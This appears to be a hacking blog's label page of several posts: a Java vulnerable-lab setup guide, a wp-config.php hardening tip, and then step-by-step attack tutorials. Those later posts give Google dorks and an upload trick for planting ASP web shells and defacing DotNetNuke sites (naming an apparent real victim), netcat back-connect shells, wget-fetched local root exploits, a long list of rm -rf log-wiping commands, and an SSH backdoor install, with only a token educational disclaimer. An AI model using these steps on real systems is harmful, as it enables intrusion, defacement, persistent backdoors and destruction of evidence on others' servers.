Showing posts with label EXPLOITS. Show all posts
Showing posts with label EXPLOITS. Show all posts

Java Vulnerable Lab – Learn to Hack and secure Java based Web Applications


We (Cyber Security and Privacy Foundation) have developed a vulnerable Java based Web Applicatoin . This app is intended for the Java Programmers and other people who wish to learn about Web application vulnerabilities and write secure code.
The full course on Hacking and Securing Web Java Programs is available in
Warning: Don’t run this app in Your Main Machine or in an online server. Install it in Vitual Machine.
How to setup Java Vulnerable Lab?
Method 1.Very Easiest Method : VirtualBox VM The Most easiest way to use Java Vulnerable is using the VirtualBox VM which has everything set up and ready to use.
Steps:
  1. Install the VirtualBox : https://www.virtualbox.org/wiki/Downloads
  2. Download the VM Image from here : http://sourceforge.net/projects/javavulnerablelab/files/v0.1/JavaVulnerableLab.ova/download
  3. Import the JavaVulnerable.ova into VirtualBox.
  4. Change the Network Settings to Host-Only Network 
  5. Start the Machine and Log into the Machine( Credentials; username: root password: cspf) 
  6. Start Tomcat by entering "service tomcat start" in the Terminal
  7. Start mysql by entering "service mysql start" in the Terminal
  8. Find the IP Address of Machine
  9. In your Browser, go to "http://[IP_ADDRESS_OF_VM]:8080/JavaVulnerableLab/install.jsp 
  10. Click the Install Button
  11. Enjoy :)


Method 2.Easiest Method : Standalone Web Application In this mehtod, you will be running an executable “JAR” file which runs the application with an embedded Apache Tomcat.
Steps:

    1. Install JDK
    2. Download Executable Jar from here: http://sourceforge.net/projects/javavulnerablelab/files/v0.2/JavaVulnerableLab.jar/download
    3. Double Click the JavaVulnerable.jar to run( if double click is not working, run this command "java -jar JavaVulnerable.jar" in your Terminal or CMD)
    4. In your Browser, go to "http://localhost:8080/JavaVulnerableLab/install.jsp 
    5. Click the Install Button

Method 3. Using War file: This is a NORMAL method to deploy the WAR file.
Steps:
   1. Install Apache Tomcat server
   2. Go to http://[Tomcat_INSTALLED_IP]:8080/manager/  (make sure you have modified tomcat-users.xml file of the tomcat to allow the manager).
   3. Download our WAR file from here: https://sourceforge.net/projects/javavulnerablelab/files/latest/JavaVulnerableLab.war/download
   4. Deploy the WAR in Apache Tomcat manager.
   5. Go to http://[Tomcat_INSTALLED_IP]:8080/JavaVulnerableLab/install.jsp 
   6. Click the Install Button

You can contribute or get the source code of Java Vulnerable Lab from here:
https://github.com/breakthesec/JavaVulnerableLab

How To Protect Wp-config.php file So You Don’t Get Hacked

Today we will be try to protect our wp-config.php file as we know that wp-config.php file contains very sensitive information about your WP Installation and database access, table prefix and Secret Keys.
The wp-config.php file is a standard of WordPress installation.
Now question is that how we protect it.
You certainly don't want this file falling into the wrong hands.


How to protect your WordPress wp-config.php file:
I will be tell you two basic methods which will protect your wp-config.php file
First I will be tell you how to protect it through .htaccesss file.
1. Download your .htaccess file from the server. This is located in the same section as your wp-config.php or index.php file. (If you don't have an .htaccess file, then you will need to create one.)
2. Using a text editor, like Notepad, open your .htaccess file.
3. Copy and paste the following code into your .htaccess file to deny access to your wp-config.php file.
# protect wpconfig.php
order allow,deny
deny from all
The second method which I am telling you guys is by protecting the wp-config by moving the file to unpredictable location.
Ok example that web include path for your server was /home/Name/public_html/
You can actually save a file in the /homeName/ area and it won’t be web accessible. Meaning that even if somebody were able to read your wp-config, they wouldn’t get anything valuable.
First step 
Create a “config.php”
Within this config.php file I included the following:
<?php
define('DB_NAME', 'your_db_name'); // The name of the database
define('DB_USER', 'your_db_username'); // Your MySQL username
define('DB_PASSWORD', 'your_db_pass'); // DB Password
define('DB_HOST', 'localhost'); // Localhost
$table_prefix = 'yourdbprefix_'; // Only numbers, letters, and underscores please!

?>
Uploaded this file to a non-WWW readable location. Normally this should be the directory before “public_html” or “www”.
Modify the WP-Config
Then modified the “wp-config.php” file to include the file. If somebody were to some how read the contents of my WP-Config, all they would see is this:

<?
phpinclude('/home/Name/config.php');
// Change this to localize WordPress. A corresponding MO file for the
// chosen language must be installed to wp-includes/languages
.// For example, install de.mo to wp-includes/languages and set WPLANG to 'de'
// to enable German language support.
define ('WPLANG', '');
/* That's all, stop editing! Happy blogging. */
define('ABSPATH', dirname(__FILE__).'/');
require_once(ABSPATH.'wp-settings.php');
?>
Hopefully you get the idea. Save your sensitive information in a non-WWW location, and have the WP-Config file read it in. This way you won’t have to change anything if you have to upgrade WordPress.

This Tutorial is not mine, Author is kind of my big brother and lot lot better than me :)

DNN ( dot net nuke ) Full TUTORIAL



                                 Step 1 : Download this Shell
                                 
                                    
                     Step 2:Now enter this dork (this is Dork for find DNN Valn sites)

                           :inurl:/tabid/36/language/en-US/Default.aspx
                                                 

                                                           OR

 
                                 inurl:/Fck/fcklinkgallery.aspx

this is a dork to find the Portal Vulnerable sites, use it wisely.

Step 3: 
it will show you many sites, Copy any one of site.

Step 4: 
For example take this site.
Example:
http://www.itservicespro.net
Step 5: Now Paste after the site url
  this:

                     /Providers/HtmlEditorProviders/Fck/fcklinkgallery.aspx

So site is this : http://itservicespro.net/Providers/HtmlEditorProviders/Fck/fcklinkgallery.aspx

So it will look like this:

Note:  if it will show you like this (see screenshot below) its mean site could not hack find another site                                          

Now Click on File ( A File On Your Site )


Step 8:Now replace the URL in the address bar with a Simple Script

                        javascript:__doPostBack('ctlURL$cmdUpload','')

Step 9:You will Find the Upload Option
  

                                                                    
Step 10:
Select Root

Step 11:
Upload your shell ASp Download it here
After upload
go for your shell  www.yoursite.com/portals/0/yourshellname.asp;.jpg
EXample : http://www.itservicespro.net/portals/0/kingofhacker.asp;.jpg
so you upload shell and shell is front of you look like this (screenshot below)
Click on <Dir>...  again and again till you will see admin

 so when it will show you this page admin area page click on UPLOAD FILE TO C:\WEBSITES\WWW.faisal1337.NET\WEBSITE\
and upload your deface index page so
this is your result www.site.com/urpagename.html
for example see this http://www.itservicespro.net/faisal.html


If  you want to deface main page then click on Admin dir and search for index htm or html and click on Edit and copy your deface page code and replace there.
thats it

NOTE
: All this for Educational purpose. I am not responsibility for any kind of problems which you cause in careless usage.

Server Rooting Tutorial


Hi guys today i will tell you how to root a server in few easy steps .
Things Required :


  • NetcaT
  • Shelled site
  • Local root expl0it 
Step By Step Tutorial :
  • First go to Run & type cmd then type : cd C:\Program Files\Netcat  ( Make sure that you Netcat is saved in the following directory ) .




  • Now Type : nc -n -l -v -p 443 , then it would show like the image shown below .
  • Its time to open your shell & then connect  using back connect function in your shell ( Make sure that you are not using any Vpn or Proxy ) . Then after the connection is established you will see something as shown in the screenshot below .
  • So you have successfully connected ..  Then now we have to get our Local Root Exploit, like mine is  2.6.18-374 2011 . 
  • In this step we have to upload our exploit in a writable folder, so instead of wasting our time in finding them ..we can just change the directory to the /tmp folder which is a standard writable folder . 
Type this command to change dir to /tmp : cd /tmp
  • To upload your your exploit we will use wget function . 
Type : wget http://www.somesite.com/exploit.c 
Now this will upload the exploit in the tmp folder . 

  •  (Case 1) if you have uploaded your exploit as .c (exploit.c) the we have to compile it, so to compile it we will type the following command .
Type : gcc exploit.c -o exploit
Keep in mind in the above command exploit refers to the name of your exploit (exploit.c) .so if its properly compiled with no errors & warning then you can proceed or if you get an error then find another exploit. 
(Case 2) If you have uploaded your exploit in a zip file then you have to unzip it by typing the below command .
Type: unzip exploit.zip 

  • After we have done all the above steps correctly, its time to give permission so we will type the following  command 
Type: chmod 777 exploit
  • Now  its time to run the Exploit, to run the exploit we will type the following command 
Type: ./exploit

Now the exploit will run & the server will be rooted  ;) .  To check weather we got root we can type 
Type: id or whoami  
Clearing Logs:

Now its our time to clearing our tracks or Logs . so below are some commands to delete the log files .
rm -rf /tmp/logs
rm -rf $HISTFILE
rm -rf /root/.ksh_history
rm -rf /root/.bash_history
rm -rf /root/.ksh_history
rm -rf /root/.bash_logout
rm -rf /usr/local/apache/logs
rm -rf /usr/local/apache/log
rm -rf /var/apache/logs
rm -rf /var/apache/log
rm -rf /var/run/utmp
rm -rf /var/logs
rm -rf /var/log
rm -rf /var/adm
rm -rf /etc/wtmp
rm -rf /etc/utmp
history -c
find / -name *.bash_history -exec rm -rf {} \;
find / -name *.bash_logout -exec rm -rf {} \;
find / -name "log*" -exec rm -rf {} \;
find / -name *.log -exec rm -rf {} \;

Hope you all guys have enjoyed this Tutorial

How To Root Server Very Detailed



Chalo G STart Karte hein

Kuch Sawalo K Jawab

1=Rooting Kia Hota Hei ??

Rooting Asal me Main Admin Tak Ponchna Yeni Is Sit Ka Admin Name Kia hei Aur Isko Bypass Kaise karte Hein Rooting Kehty hein

Asaan Alfaaz Me User Me Access Karna "Root" Kehlata hei.....


2=Hum Ko Rooting K Leye Kia Kuch Chaye?

1:-App K Paas "Shell Upload" Hona Chaye Jo Me Aap Ko Nahe Dy Sakta...
2:-App K Pass "Exploit" Hona Chaye jo K Exploit Section Me Aap Ko Mil Sakta hei...
3:-Aap K Pass "Log Cleaner" Hona Chaye Jo K Apko Mera Dost Dy Ga ( What The Hell Who is your Friend):@ Simply Google.Com...
4:-App K pass "SSH Backdoor" Hona Chaye Ye B Mere Dost K Pass He Hei G.....
5:-App K Pass "netCat" Hona Chaye Ye B Mere Dost SE He Mile Ga Yeni www. Google .Com Se....
6:-App K Pass "Putty" Software Hona Chaye Jo K Aap Ko AAp K Dost Google.com SE mily ga.....lol
7:-Aap k Pass "Brain" Hona chaye jo K Sub Se Lazmi Cheez Hei Aur Ye Na Me Dy Sakta HOn Aur Na Google Dy Sakta Hei Ye Sirf "Quraan" Dy Sakta hei....


Sub Se Pehly Hum Servers Se Back Connection Karegy
IS K Leye

Start Par Ja Kar Run Par Ja Kar Cmd Likh Kar Enter Dabana Hei Aap Ne Yeni Command Prompt Open Karna hei Pher Jaha Apny "Netcat"
Save Kiya Hei Wo Likhna hei Pher Exmple

Ap Ne NetCat ko C:// Drive Me Save Kiya Howa hei Tu Ap ne

Code:
Cd C://
Pher
Code:
Cd netcat
Code:
Cd Netcat.Exe
Is K Baad AaP Shell Ki Taraf Ajao Aap Shell Ko Firfox Ya Kisi BRowser Me Open Karo Pher Aap Shell Me Back Connection par Click Karo
Ager Nahe Hei To Koi Shell Upload Karo Jaise "priv8.php or SyRiAn Sh3ll V7 " Ye Hein "SyRiAn Sh3ll V7 " Is The Best Shell ...
Waise Aap Ki marzi hei Jo Marzi Use Karo........

Apna Ip Adress Likho Jo K pehly He Likha Hoga Ip Bar me Pher Port Me 2121 Likhy Aur connect Par Click Kar Do Aap Is Se App Shell Ko Server Par Kar Ly gy
Pher AAp Cmd B Dy Sakty hein Server K Zarye Jis Par Shell Majood hei App Ki Choice Hei...

Ab NetCat Wali Windows Ko Open Karo Aur ye Cmd Do...

[COLOR="#00FF00"]
Code:
nc -| -v -p 2121


Ye Cmd Apko Ye OutPut Dy Gi...
c:\netcat>nc -l -v -p 2121
Listning On 2121


Note:
Aap Koi B Opened Port Use Kar Sakty Hein Waise 2121 Thek Rahe Gi Q K Ye Opened Port Hei Anyway Its Your Choice....


2:-Exploit

Humne Ab Sahi Expoit Dondna Hei Jo k Hume Is Cmd Se Pata Chaly ga

Aap Shell Par Pher Chaly jaye Pher Waha type Kare

Code:
#Uname -a
Aur Enter Ka Button Dabao Aap Ko Kuch Aisa Nazar Ayega

[admin@www.target.com /home/saijyoti/public_html/cgi-bin]$ uname -a
Linux dualxeon09.ns5.999servers.com 2.6.34-194.26.1.el5 #1 SMP Tue 2011 x86_64 x86_64 x86_64 GNU/Linux

Aap Deekh Sakty Hein K Server Ka Version Karnal 2.6.34 Aur Year 2011 Hei "Its For Exmple"
Aap Ko Ab 2.6.34 2011 Exploit Chaye Jo K Aap Ko Ab Assani Se Mil Sakta hei
# PCA , or Google Ya Pher Kisi B HackForum Se Mil Sakta Hei
Nehe Tu Pher App Ko Offical Websits Se Mil Jaye Ga,,,,,.....
# Leetupload.com
# Exploit-db.com
# Packetstormsecurity.org
# Th3-0utl4ws.com


Using Of Exploit

Exploit Ko Istmaal Kaise karna hei yeni Isko Execute Kaise karna hei

Hum Ne Exploit C: Drive Me Save kar Lia Hei Lekn hum Ko Shell Par Upload Karna Hei Pher isko Compile Karne Ki Zaroorat hogi Aur
Exploit Sirf Upload Karne Se Execute Nahe Hoga Hum Ko "Shell Me TMP Directory Me Jana Hoga " Q K Tmp Hamesha Writable Directory Hoti hei Is ley Hum
Ye Cmd Type kare Gy Shell Par

Code:
cd /home/websitusername/public_html/tmp

Directory Mukhtlf B Ho Sakti Hei Maslan

cd /home/websitusername/public_html/admin/tmp

cd /home/websitusername/public_html/image/tmp
Waghera Isi Tarah He Kuch Hoga


Pher Ap ne Exploit Server Par Execute Karna Hei Us K Leye

Code:
Wget http :// exploitWebsite  .com/ 2011-exploits / exploitname.c

Code:
http: //exploitwebsite. com/ 2011-exploits/ exploitname.c
Koi WebSite Nahe Hei Is Me Ap ne Website Wo Likhni Hei Jaha Exploit Hei
Jaise Aap Exploit Download Likh Sakte Ho Aap......


Ye Cmd Deny k Baad Kuch Is Tarah Ki Screeen Hogi


Code:
admin@www.target.com /home/target_usernemr/public_html/tmp]$ wget http:// exploitwebsite. com/ 2011-exploits/ exploitname.c
--2011-09-22 05:12:14-- http://exploitwebsite.com/2011-exploits/exploitname.c
Resolving exploitwebsite.com... 199.58.192.192
Connecting to exploitwebsite . com|199.58.192.192|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 16003(15K) [text/x-csrc]
Saving to: `exploitname.c'
Note:
199.58.192.192 Ye Apka Ip Adress Hei

Ab Exploit Save Hogia Hei Humare Shelled Server par Ab Hum ne Exploit Ki Permission 777 Me Change Karni Hei....

Is K Leye Hum Cmd Dy Gy

Type

Code:
Chmod 777 ExploitName.c


Ab Exploit Humare Server Par Majood Hei Aur Full Control Hei Yeni Full Permission (777) Me Hei...

Abi Khush Mat Ho.....

Ab Hum Ne Exploit Ko Compile Aur Execute Karna Hei Jo Is Cmd Se Hogi.....

Type


Code:
gcc -o Exploit Exploitname.c
Ye Compile Ho Kar Exploit Save HO Jaye Ga Aik Exploit K Toor Par...

Pher Hum Ko Agla Proccess Hum Ne Exploit Ko Execute karna Hei Is Cmd Se

Type

Code:
./exploit 
Apko Server Jawab Dy Ga K Root Hogia hei

Ab Humko Chek Karna Hei K Ye Waqia he Root Howa hei Ya Nahe Tu Hum Ne Ye Cmd Deni Hei......

type 


Code:
Whoami
Ye Aapko Jawab Dy ga "root"

Kuch Is Tarah Hoga 

uid=xxx(root) gid=xx(root) groups=xxx(root)



Pher Ye Type Karna Hei Full Control K Leye

Type


Code:
su
Ok Done!

Chup Kar Khush Mat Ho Abi Intermition Shero Howa hei...(Joking)
3:-SSH Backdoor

Ab Hum ne BackDoors Install Karne Hei Tu Hum Ne Ye Cmd Deny Hei

Type


Code:
#Wget http:/ / www. urlofbackdoor . com/ sshdoor.zip
Pher Agy Sshdoor.zip Ko Unzip Karna hei

Hum Ye Cmd Dy Gy UnZip K Leye

Type

Code:
#Unzip Sshdoor.zip


PHer Extrect Hone K Bad Ye Cmd Deni hei
Type


Code:
Cd Sshdoor
Pher Ye Cmd Deni Hei

Code:
./run yourpass port


Yourpass Ki Jaga Aap Ne Apna Password Dena Hei Aur Port Ki Jaga Aap Ne Port Likhni Hei


Pher Aap Ne Putty Ko Open karna Hei Aur Connect Kar Dena Hei Putty K Sath ....

Ab Khush Ho Ja Jiger Jo Karna Chahta Hei Server K Sath kar Ly Ab Sever Par Tera Ful Control hei ..........lol
Bacdoor Insttaling K Leye Jo Cmd Use Hoi Hein Wo Ye hein


Code:
#Wget http : // www.urlofbackdoo r.  com/sshdoor.zip
#Unzip Sshdoor.zip
#Cd sshdoor
#./run dangeroushacker 21
Thats All


MukhTlif Language Me Exploit Ko Execute Karny K Leye Aap Ye Cmd Use Kar Sakty hei

C exploit

----------------------
gcc -o exploit exploit.c
chmod +x exploit
./exploit
----------------------


Perl Exploits

---------------
perl exploit.pl
---------------


Python

------------------
python exploit.py
------------------

php

-----------------
php exploit.php
-----------------


zip

----------------
unzip exploit.zip
./run
---------------
-

Ager Kisi Ko Pher B Samj Na I Ho Tu Please MujSe Mat Pochye ga......

Ye Tutorial Mene Bari Mehnat Se Khud Likha Hei Ager Koi Ghalti Hoi Ho Tu Plz Maaf Kar Dijye Ga Aur Yahan Post Kar Dijeye ga....Thnx

Just for Education Purpose !!